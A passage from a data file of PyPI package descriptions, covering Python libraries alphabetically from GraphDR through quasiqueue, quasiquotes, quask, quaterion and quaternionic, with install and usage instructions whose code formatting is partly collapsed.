direct\ncomparison across datasets by applying a common linear transform. GraphDR also supports incorporating\ncomplex experiment design through graph construction (see example from manuscript and ./Manuscript directory).\nGraphDR is also very fast. It can process a 1.5 million-cell dataset in 5min (CPU) or 1.5min (CPU) and\ncan easily scale to even larger datasets.StructDR - flexible structure extraction and inference of confidence sets:StructDR is based on nonparametric density ridge estimation (NRE). StructDR is a flexible framework\nfor structure extraction for single-cell data that unifies cluster, trajectory, and surface estimation\nby casting these problems as identifying 0-, 1-, and 2- dimensional density ridges. StructDR also support\nadaptively decides ridge dimensionality based on data. When used with linear representation such as PCA,\nStructDR allows inference of confidence sets of density ridge positions. This allows, for example,\nestimation of uncertainties of the developmental trajectories extracted.Command-line toolsWe also provide command-line tools to run those methods without writing any code. Basic single-cell data preprocessing options are provided inrun_graphdr.py, even though we generally recommend preprocessing single cell data with a dedicated package such as scanpy or Seurat to select highly variable genes and normalize before providing it to GraphDR. You can add the-hoption to access help information to each tool.run_graphdr.pypython run_graphdr.py ./example/Dentate_Gyrus.spliced_data.gz --pca --plot --log --transpose --scale --max_dim 50 --refine_iter 4 --reg 500 --no_rotation --anno_file ./example/Dentate_Gyrus.anno.gz --anno_column ClusterNamerun_structdr.pypython run_structdr.py --bw 0.1 --automatic_bw 0 --input ./example/Dentate_Gyrus.spliced_data.gz.dim50_k10_reg500_n4t12_pca_no_rotation_log_scale_transpose.graphdr.small.gz --anno_file ./example/Dentate_Gyrus.anno.small.gz --anno_column ClusterName --output ./example/Dentate_Gyrus.spliced_data.gz.dim50_k10_reg500_n4t12_pca_no_rotation_log_scale_transpose.graphdr.small.gzGraphical Interface - TrentiWe developed a web-based GUI, Trenti (Trajectory exploration interface), for single cell data visualization and exploratory analysis, supporting GraphDR, StructDR, common dimensionality reduction and clustering methods, and provide a 3D interface for visualization and a gene expression exploration interface.To use Trenti, you need to install additional dependencies:pip install umap-learn dash==2.0.0 dash-colorscales networkxSee./trenti/README.mdfor details. For a quick-start example, runpython ./trenti/app.py -i ./example/Dentate_Gyrus.data_pca.gz -f ./example/Dentate_Gyrus.spliced_data.gz -a ./example/Dentate_Gyrus.anno.gz --samplelimit=5000 --log --mode graphdrthen visitlocalhost:8050in your browser."} +{"package": "quasimc", "pacakge-description": "No description available on PyPI."} +{"package": "quasimodo", "pacakge-description": "No description available on PyPI."} +{"package": "quasinet", "pacakge-description": "QuasinetDescriptionInfer non-local structural dependencies in genomic sequences. Genomic sequences are esentially compressed encodings of phenotypic information. This package provides a novel set of tools to extract long-range structural dependencies in genotypic data that define the phenotypic outcomes. The key capabilities implemented here are as follows:Compute the Quasinet (Q-net) given a database of nucleic acid sequences. The Q-net is a family of conditional inference trees that capture the predictability of each nucleotide position given the rest of the genome. The constructed Q-net for COVID-19 and Influenza A H1N1 HA 2008-9 is shown below.COVID-19INFLUENZACompute a structure-aware evolution-adaptive notion of distance between genomes, which is demonstrably more biologically relevant compared to the standard edit distance.Draw samples in-silico that have a high probability of being biologically correct. For example, given a database of Influenza sequences, we can generate a new genomic sequence that has a high probability of being a valid influenza sequence.InstallationTo install with pip:pip install quasinetTo fix error with Mac or Windows:from quasinet.osfix import osfix\n# for windows\nosfix('win')\n# for max x86_64 (macbook pro)\nosfix('macx86')\n# mac arm (macbook air)\nosfix('macarm')NOTE: If trying to reproduce the paper below, please usepip install quasinet==0.0.58Dependenciesscikit-learnscipynumpynumbapandasjoblibbiopythonUsagefrom quasinet import qnet\n\n# initialize qnet\nmyqnet = qnet.Qnet()\n\n# train the qnet\nmyqnet.fit(X)\n\n# compute qdistance\nqdist = qnet.qdistance(seq1, seq2, myqnet, myqnet)ExamplesExamples are locatedhere.DocumentationFor more documentation, seehere.PapersFor reference, please check out our paper:Preparing For the Next Pandemic: Learning Wild Mutational Patterns At Scale For Analyzing Sequence Divergence In Novel PathogensAuthorsYou can reach the ZED lab at: zed.uchicago.edu"} +{"package": "quasi-poisson", "pacakge-description": "IntroductionThe purpose of this package is to estimate the Quasi-Poisson regression. It is a project in progress.Should you have any question or suggestion about the package, please feel free to drop me a line.AuthorsWenSui Liuis a seasoned data scientist with 15-year experience in the financial service industry.Joyce Liuis a college student majoring in Mathematics with a strong passion for data science."} +{"package": "quasiqueue", "pacakge-description": "QuasiQueueQuasiQueue is a MultiProcessing library for Python that makes it super easy to have long running MultiProcess jobs. QuasiQueue handles process creation and cleanup, signal management, cross process communication, and all the other garbage that makes people hate dealing with multiprocessing.QuasiQueue works by splitting the work into two components- the main process whose job it is to feed a Queue with work, and then read processes that take work off of the Queue to run. All the developers have to do is create two functions-writeris called when the queue gets low. It should return an iterable (list, generator) that QuasiQueue uses to grow the multiprocess Queue.readeris called once for each item in the Queue. It runs in a completely different process from thewriter.flowchart LR\n writer(writer)-->queue((queue))\n queue-->reader1(reader)\n queue-->reader2(reader)\n queue-->reader3(reader)\n queue-->reader4(reader)These functions can be as simple or complex as you need.importasynciofromquasiqueueimportQuasiQueueasyncdefwriter(desired_items:int):\"\"\"Feeds data to the Queue when it is low.\"\"\"returnrange(0,desired_items)asyncdefreader(identifier:int|str):\"\"\"Receives individual items from the queue.Args:identifier (int | str): Comes from the output of the Writer function\"\"\"print(f\"{identifier}\")runner=QuasiQueue(\"hello_world\",reader=reader,writer=writer,)asyncio.run(runner.main())Use CasesThere are a ton of use cases for QuasiQueue.WebServerQuasiQueue could be the basis for a web server. Thewritefunction would need to feed sockets to the Queue, would would be picked up by thereaderfor handling.flowchart LR\n\n subgraph Configuration\n http\n end\n\n subgraph Server\n http-->writer\n writer(writer)--socket-->queue((queue))\n queue--socket-->reader1(reader)\n queue--socket-->reader2(reader)\n queue--socket-->reader3(reader)\n queue--socket-->reader4(reader)\n endWebsite Image CrawlerQuasiQueue could be used to crawl a website, or series of websites, to download data.flowchart RL\n\n subgraph Crawler\n writer(writer)-->queue((queue))\n queue-->reader1(reader)\n end\n database(Links)--Stale or Unread Links-->writer\n reader1(reader)--Images-->FileSystem\n reader1(reader)--Found Links-->databaseAs new pages are found they get added to a database. The write pulls pages out of the database as the queue gets smaller, and the reader adds new pages that it finds to the database. The writer function can pull links that haven't been crawled at all, and once it runs out of those it can recrawl links based on their age.Image ProcessorQuasiQueue can be used to run large one off jobs as well, such as processing a list of images. If someone has several thousand images to process they can have the writer function feed the list into the Queue, and reader processes can take the files from the queue and run the processing needed.flowchart LR\n\n subgraph Configuration\n filelist\n end\n\n subgraph ImageProcessor\n filelist-->writer\n writer(writer)-->queue((queue))\n queue-->reader1(reader)\n end\n reader1(reader)-->ProcessedFilesInstallationpipinstallquasiqueueArgumentsNameThe first argument when initilizing QuasiQueue is the name of the queue. This is used when naming new processes (which makes logging andpscommands a lot more useful)ReaderThe reader function is called once per item in the queue.asyncdefreader(identifier:int|str):\"\"\"Receives individual items from the queue.Args:identifier (int | str): Comes from the output of the Writer function\"\"\"print(f\"{identifier}\")The reader can be extremely simple, as this one liner shows, or it can be extremely complex.The reader can be asynchronous or synchronous. Since each reader runs in its own process there is no performance benefits to using async, but it does make it easier for projects that use a lot of async code to reuse their existing async libraries inside of the reader.WriterThe write function is called whenever the Queue is low. It has to return an iterator of items that can be pickled (strings, integers, or sockets are common examples) that will be feed to the Reader. Generators are a great option to reduce memory usage, but even simple lists can be returned. The writer function has to be asynchronous.The writer function only has one argument- the desired number of items that QuasiQueue would like to retrieve and add to the Queue. This number is meant to allow for optimization on behalf of the developers- it can be completely ignored, but QuasiQueue will run more efficiently if you keep it as close thedesired_itemsas possible.asyncdefwriter(desired_items:int):\"\"\"Feeds data to the Queue when it is low.\"\"\"returnrange(0,desired_items)In the event that there are no items available to put in the Queue the write function should returnNone. This will signal to QuasiQueue that there is nothing for it, and it will add a slight (configurable) delay before attempting to retrieve more items.QuasiQueue will prevent items that were recently placed in the Queue from being requeued within a configurable time frame. This is meant to make the write function more lenient- if it happens to return duplicates between calls QuasiQueue will just discard them.ContextThe context function is completely optional. It runs once, and only once, when a new reader process is launched. It is used to initialize resources such as database pools so they can be reused between reader calls.If the function is provided it should return a dictionary. The reader function will need to have a context argument, which will be the results from the context function. The context function can be asynchronous or synchronous.defcontext():ctx={}ctx['http']=get_http_connection_pool()ctx['dbengine']=get_db_engine_pool()returnctxdefreader(identifier:int|str,ctx:Dict[str,Any]):\"\"\"Receives individual items from the queue.Args:identifier (int | str): Comes from the output of the Writer functionctx (Dict[str, Any]): Comes from the output of the Context function\"\"\"ctx['dbengine'].execute(\"get item\")ctx['http'].get(\"url\")print(f\"{identifier}\")runner=QuasiQueue(\"hello_world\",reader=reader,writer=writer,context=context)Although this function is not required it can have amazing performance implications. Connection pooling of databases and websites can save a remarkable amount of resources on SSL handshakes alone.SettingsQuasiQueue has a variety of optimization settings that can be tweaked depending on usage.NameTypeDescriptionDefaultempty_queue_sleep_timefloatThe time in seconds that QuasiQueue will sleep the writer process when it returns no results.1.0full_queue_sleep_timefloatThe time in seconds that QuasiQueue will sleep the writer process if the queue is completely full.5.0graceful_shutdown_timeoutintegerThe time in seconds that QuasiQueue will wait for readers to finish when it is asked to gracefully shutdown.30lookup_block_sizeintegerThe default desired_items passed to the writer function. This will be adjusted lower depending on queue dynamics.10max_jobs_per_processintegerThe number of jobs a reader process will run before it is replaced by a new process.200max_queue_sizeintegerThe max allowed size of the queue.300num_processesintegerThe number of reader processes to run.2prevent_requeuing_timeintegerThe time in seconds that an item will be prevented from being readded to the queue.300queue_interaction_timeoutfloatThe time QuasiQueue will wait for the Queue to be unlocked before throwing an error.0.01Settings can be configured programmatically, via environment variables, or both.Environment VariablesAll Settings can be configured via environment variables. The variables should start with the QuasiQueue name and an underscore. For example, if you named your QuasiQueueAcmethenACME_NUM_PROCESSwould be used to set the number of processes.ProgrammaticThere are two methods to programmatically define the settings.The first one is to initialize the settings and override the specific ones.fromquasiqueueimportSettings,QuasiQueueQuasiQueue(\"MyQueue\",reader=reader,writer=writer,settings=Settings(lookup_block_size=50))This method is simple, but the downside is that you lose the environment variable prefixes. So when using this method you have to setNUM_PROCESSESrather thanMYQUEUE_NUM_PROCESSES. The work around is to extend the Settings object to give it your desired prefix.fromquasiqueueimportSettings,QuasiQueuefrompydantic_settingsimportSettingsConfigDictclassMySettings(Settings)model_config=SettingsConfigDict(env_prefix=\"MY_QUEUE_\")lookup_block_size:int=50QuasiQueue(\"MyQueue\",reader=reader,writer=writer,settings=MySettings())"} +{"package": "quasiquotes", "pacakge-description": "Blocks of non-python code sprinkled in for extra seasoning.What is aquasiquoteAnquasiquoteis a new syntactical element that allows us to embed non\npython code into our existing python code. The basic structure is as follows:# coding: quasiquotes[$name|somecodegoeshere|]This desuagars to:name.quote_expr(\"some code goes here\",frame,col_offset)whereframeis the executing stack frame andcol_offsetis the column\noffset of the quasiquoter.This allows us to use slightly nicer syntax for our code.\nThe# coding: quasiquotesis needed to enable this extension.\nThe syntax is chosen to match haskell\u2019s quasiquote syntax from GHC 6.12. We need\nto use the older syntax (with the$) because python\u2019s grammar would be\nambiguous without it at the quote open step. To simplify the tokenizer, we chose\nto use slighly more verbose syntax.We may also use statement syntax for quasiquotes in a modified with block:# coding: quasiquoteswith$name:somecodegoeshereThis desuagars to:name.quote_stmt(\" some code goes here\",frame,col_offset)ThecquasiquoterThe builtincquasiquoter allows us to inline C code into our python.\nFor example:>>>fromquasiquotes.cimportc>>>deff(a):...with$c:...printf(\"%ld\\n\",PyLong_AsLong(a));...a=Py_None;...Py_INCREF(a);...print(a)...>>>f(0)0None>>>f(1)1NoneHere we can see that the quasiquoter can read from and write to the local\nscope.We can also quote C expressions with the quote expression syntax.>>>defcell_new(n):...return[$c|PyCell_New(n);]...>>>cell_new(1)Here we can see that thecquasiquoter is really convenient as a python\ninterface into the C API.WarningCPython uses a reference counting system to manage the lifetimes of objects.\nCode like:return[$|Py_None|]can cause a potential segfault whenNonebecause it will have 1 less\nreference than expected. Instead, be sure to remember to incref your\nexpressions with:return[$|Py_INCREF(Py_None);Py_None|]You must also incref when reassigning names from the enclosing python scope.\nFor more information, see theCPython docs.IPython IntegrationWe can use thecquasiquoter in the IPython repl or notebook as a cell or\nline magic. When used as a line magic, it is quoted as an expression. When used\nas a cell magic, it is quoted as a statement.In[1]:importquasiquotes.cIn[2]:a=5In[3]:%cPyObject*b=PyLong_FromLong(3);PyObject*ret=PyNumber_Add(a,b);Py_DECREF(b);ret;Out[3]:8In[4]:%%c...:printf(\"%ld+%ld=%ld\\n\",3,PyLong_AsLong(a),PyLong_AsLong(_3));...:puts(\"reassigning 'a'\");...:a=Py_None;...:Py_INCREF(a);...:3+5=8reassigning'a'In[5]:aisNoneOut[5]:True"} +{"package": "quasis", "pacakge-description": "Quasis utlity packageThis package mostly exists to make my own life easier working with AWS lambda, it exports a few useful functions regarding numbers/primality/divisibility"} +{"package": "quasi-utils", "pacakge-description": "Example PackageThis is a simple example package. You can useGithub-flavored Markdownto write your content.\"# quasi_utils\"python -m build\ntwine upload dist/*"} +{"package": "quask", "pacakge-description": "QuASKQuantum Advantage Seeker with KernelQuASK is a quantum machine learning software written in Python that\nsupports researchers in designing, experimenting, and assessing\ndifferent quantum and classic kernels performance. This software\nis package agnostic and can be integrated with all major quantum\nsoftware packages (e.g. IBM Qiskit, Xanadu\u2019s Pennylane, Amazon Braket).QuASK guides the user through a simple preprocessing of input data,\ndefinition and calculation of quantum and classic kernels,\neither custom or pre-defined ones. From this evaluation the package\nprovide an assessment about potential quantum advantage and prediction\nbounds on generalization error.Beyond theoretical framing, it allows for the generation of parametric\nquantum kernels that can be trained using gradient-descent-based\noptimization, grid search, or genetic algorithms. Projected quantum\nkernels, an effective solution to mitigate the curse of dimensionality\ninduced by the exponential scaling dimension of large Hilbert spaces,\nis also calculated. QuASK can also generate the observable values of\na quantum model and use them to study the prediction capabilities of\nthe quantum and classical kernels.The initial release is accompanied by the journal article\"QuASK - Quantum\nAdvantage Seeker with Kernels\" available on arxiv.org.DocumentationThe documentation for QuASK can be accessed on the websiteRead The Docs.InstallationThe software has been tested on Python 3.9.10. We recommend using this version or a newer one.The library is available on the Python Package Index (PyPI) withpip install quask.UsageUse quask as a library of software componentsQuASK can be used as a library to extend your own software. Check if everything's working with:importnumpyasnpimportquask.metricsA=np.array([[1,2],[3,4]])B=np.array([[5,6],[7,8]])print(quask.metrics.calculate_frobenius_inner_product(A,B))# 70Use quask as a command-line interface toolQuASK can be used as a command-line interface to analyze the dataset with the\nkernel methods. These are the commands implemented so far.To retrieve the datasets available:$ python3.9 -m quask get-datasetTo preprocess a dataset:$ python3.9 -m quask preprocess-datasetTo analyze a dataset using quantum and classical kernels:$ python3.9 -m quask apply-kernelTo create some plot of the property related to the generated Gram matrices:$ python3.9 -m quask plot-metric --metric accuracy --train-gram training_linear_kernel.npy --train-y Y_train.npy --test-gram testing_linear_kernel.npy --test-y Y_test.npy --label linearCreditsPlease cite the work using the following Bibtex entry:@article{https://doi.org/10.48550/arxiv.2206.15284,\n doi = {10.48550/ARXIV.2206.15284},\n url = {https://arxiv.org/abs/2206.15284},\n author = {Di Marcantonio, Francesco and Incudini, Massimiliano and Tezza, Davide and Grossi, Michele},\n keywords = {Quantum Physics (quant-ph), Machine Learning (cs.LG), FOS: Physical sciences, FOS: Physical sciences, FOS: Computer and information sciences, FOS: Computer and information sciences},\n title = {QuASK -- Quantum Advantage Seeker with Kernels},\n publisher = {arXiv},\n year = {2022},\n copyright = {Creative Commons Attribution 4.0 International}\n}"} +{"package": "quaspy", "pacakge-description": "QuaspyTheQuaspy(Quantum algorithm simulations in Python) library forPython3contains modules that implement:Simulators for the quantum part of Shor's order-finding algorithm[Shor94], modified as in[E22p], and the classical post-processing in[E22p]that recovers the order in a single run with very high success probability.Simulators for factoring general integers via order-finding, and the post-processing in[E21b]and[E22p]that factors any integer completely in a single order-finding run with very high success probability.Simulators for the quantum part of Shor's algorithm for computing general discrete logarithms[Shor94], modified as in[E19p], and the post-processing in[E19p]that recovers the logarithm given the order in a single run with very high probability of success.Simulators for the quantum part of Eker\u00e5\u2013H\u00e5stad's algorithm for computing short discrete logarithms[EH17], modified as in[E20]and[E23p], and the post-processing in[E23p]that recovers the logarithm in a single run with very high probability of success. This algorithm does not require the order to be known.Simulators for factoring RSA integers via short discrete logarithms, by using the reduction in[EH17], modified as in[E20]and[E23p], and the post-processing in[E23p]that factors random RSA integers in a single run with very high probability of success.All modules, classes, methods and functions inQuaspyaredocumentedusingPython3docstrings.Note thatQuaspydoes not implement support for tradeoffs in the aforementioned algorithms. Support for tradeoffs may potentially be added in the future. For the time being, see instead theQunundrumrepository with its suite of MPI programs. Note furthermore that portions ofQuaspyare inherited from theFactoritallrepository.Quaspyis a work in progress, and may be subject to major changes without prior notice.Quaspywas developed for academic research purposes. It grew out of our research project in an organic manner as research questions were posed and answered. It is distributed \"as is\" without warranty of any kind, either expressed or implied. For further details, see thelicense.ExamplesFor examples that illustrate how to useQuaspy, please see theexamplesdirectory in theQuaspyrepository.See also thedocumentationforQuaspyfor help on how to use the library.About and acknowledgmentsTheQuaspylibrary was developed byMartin Eker\u00e5, in part atKTH, the Royal Institute of Technology, in Stockholm,Sweden. Valuable comments and advice were provided by Johan H\u00e5stad throughout the development process.Funding and support was provided by the Swedish NCSA that is a part of theSwedish Armed Forces."} +{"package": "quasselconf", "pacakge-description": "This is a simple Python 3 application that uses PyQt5 to read (and, in\nthe future, write) Quassel configuration files.Quassel stores QVariants encoded as a string / bytestream in its\nconfiguration files, most notably to store the database connection data.\nAs a result, this information can only be accessed and modified by\nquassel itself. This program is an attempt to make reading and modifying\nthose files much easier.Currently, all this program does is dump the specified quassel config\nfile to terminal with all QVariants (or other objects) replaced by their\nstring representation. That translates the following configuration file:[Config]\nVersion=1\n\n[Core]\nCoreState=@Variant(\\0\\0\\0\\b\\0\\0\\0\\x2\\0\\0\\0 \\0\\x43\\0o\\0r\\0\\x65\\0S\\0t\\0\\x61\\0t\\0\\x65\\0V\\0\\x65\\0r\\0s\\0i\\0o\\0n\\0\\0\\0\\x2\\0\\0\\0\\x1\\0\\0\\0\\x1c\\0\\x41\\0\\x63\\0t\\0i\\0v\\0\\x65\\0S\\0\\x65\\0s\\0s\\0i\\0o\\0n\\0s\\0\\0\\0\\t\\0\\0\\0\\x1\\0\\0\\0\\x7f\\0\\0\\0\\aUserId\\0\\0\\0\\0\\x1)\nStorageSettings=@Variant(\\0\\0\\0\\b\\0\\0\\0\\x1\\0\\0\\0\\xe\\0\\x42\\0\\x61\\0\\x63\\0k\\0\\x65\\0n\\0\\x64\\0\\0\\0\\n\\0\\0\\0\\f\\0S\\0Q\\0L\\0i\\0t\\0\\x65)To the much more human-friendly output of:[Config]\nVersion=1\n\n[Core]\nCoreState={}\nStorageSettings={'Backend': 'SQLite'}Installationquasselconf can be installed as a Python module. It only has one\nexternal dependency, which is PyQt5.On systems with pip, it can be installed as follows:pip install quasselconfUsagequasselconf\u2019s command line interface is currently extremely primitive\n(as is the tool itself). It currently takes two arguments:-c[/path/to/config/dir: Much like quassel itself, you can\nspecify the location of the quassel configuration directory.Unlikequassel, the default is assumed to be /var/lib/quassel, as that is\nusually where core configuration is to be found on most (Linux)\nsystems.-t[core|client|mono]: With this flag, you can specify which\nquassel config file will be read. The default is \u201ccore\u201d. (\u201cmono\u201d\nrefers to the monolithic client with configuration file\nquassel.conf).The specified config file will be parsed and printed to standard output.\nIn the future, quasselconf will probably support reading in a human\nreadable configuration file from standard input and write the correct\nform to standard output.Credits / Licensequasselconf was developed by Ben Rosser and is released under the MIT\nlicense."} +{"package": "quast", "pacakge-description": "QUAST evaluates genome assemblies.\nIt works both with and without reference genomes.\nThe tool accepts multiple assemblies, thus is suitable for comparison."} +{"package": "quaterion", "pacakge-description": "Blazing fast framework for fine-tuning Similarity Learning modelsA dwarf on a giant's shoulders sees farther of the twoQuaterion is a framework for fine-tuning similarity learning models.\nThe framework closes the \"last mile\" problem in training models for semantic search, recommendations, anomaly detection, extreme classification, matching engines, e.t.c.It is designed to combine the performance of pre-trained models with specialization for the custom task while avoiding slow and costly training.Features\ud83c\udf00Warp-speed fast: With the built-in caching mechanism, Quaterion enables you to train thousands of epochs with huge batch sizes even onlaptop GPU.\ud83d\udc08\u200dSmall data compatible: Pre-trained models with specially designed head layers allow you to benefit even from a dataset you can labelin one day.\ud83c\udfd7\ufe0fCustomizable: Quaterion allows you to re-define any part of the framework, making it flexible even for large-scale and sophisticated training pipelines.\ud83c\udf0cScalable: Quaterion is built on top ofPyTorch Lightningand inherits all its scalability, cost-efficiency, and reliability perks.InstallationTL;DR:For training:pipinstallquaterionFor inference service:pipinstallquaterion-modelsQuaterion framework consists of two packages -quaterionandquaterion-models.Since it is not always possible or convenient to represent a model in ONNX format (also, itis supported), the Quaterion keeps a very minimal collection of model classes, which might be required for model inference, in aseparate package.It allows avoiding installing heavy training dependencies into inference infrastructure:pip install quaterion-modelsAt the same time, once you need to have a full arsenal of tools for training and debugging models, it is available in one package:pip install quaterionDocs \ud83d\udcd3Quick StartGuideMinimal workingexamplesFor a more in-depth dive, check out our end-to-end tutorials:Fine-tuning NLP models -Q&A systemsFine-tuning CV models -Similar Cars SearchTutorials for advanced features of the framework:Cache tutorial- How to make training fast.Head Layers: Skip Connection- How to avoid forgetting while fine-tuningEmbedding Confidence- how do I know that the model is sure about the output vector?Vector Collapse Prevention- how to prevent vector space collapse in Triplet LossCommunityJoin ourDiscord channelFollow us onTwitterSubscribe to ourNewslettersWrite us an emailinfo@qdrant.techLicenseQuaterion is licensed under the Apache License, Version 2.0. View a copy of theLicense file."} +{"package": "quaterion-models", "pacakge-description": "Quaterion Modelsquaterion-modelsis a part ofQuaterion, similarity learning framework.\nIt is kept as a separate package to make servable models lightweight and free from training dependencies.It contains definition of base classes, used for model inference, as well as the collection of building blocks for building fine-tunable similarity learning models.\nThe documentation can be foundhere.If you are looking for the training-related part of Quaterion, please see themain repositoryinstead.Installpipinstallquaterion-modelsIt makes sense to installquaterion-modelsindependent of the main framework if you already have trained model\nand only need to make inference.Load and inferencefromquaterion_modelsimportSimilarityModelmodel=SimilarityModel.load(\"./path/to/saved/model\")embeddings=model.encode([{\"description\":\"this is an example input\"},{\"description\":\"you may have a different format\"},{\"description\":\"the output will be a numpy array\"},{\"description\":\"of size [batch_size, embedding_size]\"},])ContentSimilarityModel- main class which contains encoder models with the head layerBase class for EncodersBase class and various implementations of the Head LayersAdditional helper functions"} +{"package": "quaternion-algebra", "pacakge-description": "Quaternion arithmetics for Python.Usage:>>> from quaternion import Quaternion as H\n>>> q1 = H(2, 3, 2, 3)\n>>> q2 = H(3, 2, 3, 2)\n>>> q1 * q2\n(-12 + 8i + 12j + 18k)\n>>> q2 * q1)\n(-12 + 18i + 12j + 8k))"} +{"package": "quaternionarray", "pacakge-description": "Python module for multiplying, rotating and interpolating arrays of quaternions.Implemented in Numpy, making use of fast arrays operations.http://andreazonca.com/software/quaternion-array/"} +{"package": "quaternionic", "pacakge-description": "Quaternionic arraysThis module subclasses numpy's array type, interpreting the array as an array of quaternions, and\naccelerating the algebra using numba. This enables natural manipulations, like multiplying\nquaternions asa*b, while also working with standard numpy functions, as innp.log(q). There is\nalso basic initial support for symbolic manipulation of quaternions by creating quaternionic arrays\nwith sympy symbols as elements, though this is a work in progress.This package has evolved from thequaternionpackage, which\nadds a quaternion dtype directly to numpy. In some ways, that is a better approach because dtypes\nare built in to numpy, making it more robust than this package. However, that approach has its own\nlimitations, including that it is harder to maintain, and requires much of the code to be written in\nC, which also makes it harder to distribute. This package is written entirely in python code, but\nshould actually have comparable performance because it is compiled by numba. Moreover, because the\ncore code is written in pure python, it is reusable for purposes other than the core purpose of this\npackage, which is to provide the numeric array type.InstallationBecause this package is pure python code, installation is very simple. In particular, with\na reasonably modern installation, you can just runcondainstall-cconda-forgequaternionicorpython-mpipinstallquaternionicThese will download and install the package. (Usingpython -m pipinstead of justpiporpip3helps avoid problems that new python users frequently run into; the reason is explained by a veteran\npython core contributorhere.)You can also install the package from source if you havepipversion 10.0 or greater by runningpython -m pip install .\u2014 or if you havepoetryby runningpoetry install\u2014 from the top-level\ndirectory.Note that only python 3.8 or greater is supported. (I have also tried to support PyPy3, although\nI cannot test this asscipydoes not currently install. Pull requests are welcome.) In any case,\nI strongly recommend installing by way of an environment manager \u2014 especiallyconda, though other managers likevirtualenvorpipenvshould also work.For development work, the best current option ispoetry. From the\ntop-level directory, you can runpoetry run to run the command in an isolated\nenvironment.UsageBasic constructionThe key function isquaternionic.array, which takes nearly the same arguments asnumpy.array,\nexcept that whatever array will result must have a final axis of size 4 (and thedtypemust befloat). As long as these conditions are satisfied, we can create new arrays or just reinterpret\nexisting arrays:importnumpyasnpimportquaternionica=np.random.normal(size=(17,11,4))# Just some random numbers; last dimension is 4q1=quaternionic.array(a)# Reinterpret an existing arrayq2=quaternionic.array([1.2,2.3,3.4,4.5])# Create a new arrayIn this example,q1is an array of 187 (17*11) quaternions, just to demonstrate that any number of\ndimensions may be used, as long as the final dimension has size 4.Here, the original arrayawill still exist just as it was, and will behave just as a normal numpy\narray \u2014 including changing its values (which will change the values inq1), slicing, math, etc.\nHowever,q1will be another\"view\"into the same\ndata. Operations onq1will be quaternionic. For example, whereas1/areturns the element-wise\ninverse of each float in the array,1/q1returns thequaternionicinverse of each quaternion.\nSimilarly, if you multiply two quaternionic arrays, their product will be computed with the usual\nquaternion multiplication, rather than element-wise multiplication of floats as numpy usually\nperforms.:warning: WARNINGBecause of an unfortunate choice by the numpy developers, thenp.copyfunction will not preserve the quaternionic nature of an array by default; the result will just be a plain array of floats. You could pass the optional argumentsubok=True, as inq3 = np.copy(q1, subok=True), but it's easier to just use the member function:q3 = q1.copy().AlgebraAll the usual quaternion operations are available, includingAdditionq1 + q2Subtractionq1 - q2Multiplicationq1 * q2Divisionq1 / q2Scalar multiplicationq1 * s == s * q1Scalar divisionq1 / sands / q1Reciprocalnp.reciprocal(q1) == 1/q1Exponentialnp.exp(q1)Logarithmnp.log(q1)Square-rootnp.sqrt(q1)Conjugatenp.conjugate(q1) == np.conj(q1)All numpyufuncsthat make sense for\nquaternions are supported. When the arrays have different shapes, the usual numpybroadcastingrules take effect.AttributesIn addition to the basic numpy array features, we also have a number of extra properties that are\nparticularly useful for quaternions, includingMethods to extract and/or set componentsw,x,y,zi,j,k(equivalent tox,y,z)scalar,vector(equivalent tow, [x,y,z])real,imag(equivalent toscalar,vector)Methods related to normsabs(square-root of sum of squares of components)norm(sum of squares of components)modulus,magnitude(equal toabs)absolute_square,abs2,mag2(equal tonorm)normalizedinverseMethods related to array infrastructurendarray(the numpy array underlying the quaternionic array)flattened(all dimensions but last are flattened into one)iterator(iterate over all quaternions)Note that this package makes a distinction betweenabsandnorm\u2014 the latter being equal to the\nsquare of the former. This version of the norm is also known as the \"Cayley\" norm, commonly used\nwhen emphasizing the properties of an object in an algebra, as opposed to the \"Euclidean\" norm more\ncommon when emphasizing the properties of an object in a vector space \u2014 though of course, algebras\nare vector spaces with additional structure. This choice agrees with theBoost library's\nimplementation of\nquaternions,\nas well as this package's forerunnerquaternion.\nThis also agrees with the corresponding functions on theC++ standard library's complex\nnumbers. Because this may be confusing, a number\nof aliases are also provided that may be less confusing. For example, some people find the pairabsandabs2(meaning the square ofabs) to be more sensible.RotationsThe most common application of quaternions is to representing rotations by means of unit\nquaternions. Note that this package does notrestrictquaternions to have unit norms, since it is\nusually better for numerical purposes not to do so. For example, whereas rotation of a vector $v$\nby a quaternion is usually implemented as $R, v, \\bar{R}$, it is generally better to drop the\nassumption that the quaternion has unit magnitude and implement rotation as $R, v, R^{-1}$. This\nis almost always more efficient, and more accurate. That is what this package does by default\nwhenever rotations are involved.Although this package does not restrict to unit quaternions, there are several converters to and\nfrom other representations of rotations. First, we haveto_vector_part,from_vector_partThese convert between the standard 3-d vector representation and their equivalent quaternions, which\nallows them to be manipulated as vectors \u2014 as inR * from_vector_part(v) * R.conjugate(). However,\nnote that you may not need to convert to/from quaternions. For example, to rotate vectorsvbyR, you can useR.rotate(v)It may also be relevant to consider a vector as a \"generator\" of\nrotations, in which case the actual rotation is obtained by applyingexpto the generator. Thisdoesrequire conversion to a quaternionic array. We also have converters that deal with standard\nrepresentations of rotations:to_rotation_matrix,from_rotation_matrixto_transformation_matrix(for non-unit quaternions)to_axis_angle,from_axis_angleto_euler_angles,from_euler_angles(though using Euler angles is almost always a bad idea)to_euler_phases,from_euler_phases(see above)to_spherical_coordinates,from_spherical_coordinatesto_angular_velocity,from_angular_velocityto_minimal_rotationNote that the last two items relate to quaternion-valued functions of time. Converting to an angular\nvelocity requires differentiation, while converting from angular velocity requires integration (as\nexplored inthis paper). The\"minimal rotation\"modifies an input rotation-function-of-time to\nhave the same effect on thezaxis, while minimizing the amount of rotation that actually happens.For these converters, the \"to\" functions are properties on the individual arrays, whereas the \"from\"\nfunctions are \"classmethod\"s that take the corresponding objects as inputs. For example, we could\nwriteq1=quaternionic.array(np.random.rand(100,4)).normalizedm=q1.to_rotation_matrixto obtain the matrixmfroma quaternionic arrayq1. (Here,mis actually a series of 100\n3x3 matrices corresponding to the 100 quaternions inq1.) On the other hand, to obtain a\nquaternionic array from some matrixm, we would writeq2=quaternionic.array.from_rotation_matrix(m)Also note that, because the unit quaternions form a \"double cover\" of the rotation group (meaning\nthat quaternionsqand-qrepresent the same rotation), these functions are not perfect inverses\nof each other. In this case, for example,q1andq2may have opposite signs. We can, however,\nprove that these quaternions represent the same rotations by measuring the \"distance\" between the\nquaternions as rotations:np.max(quaternionic.distance.rotation.intrinsic(q1,q2))# Typically around 1e-15Also note the classmethodrandomThis constructs a quaternionic array in which each component is randomly selected from a normal\n(Gaussian) distribution centered at 0 with scale 1, which means that the result is isotropic\n(spherically symmetric). It is also possible to pass 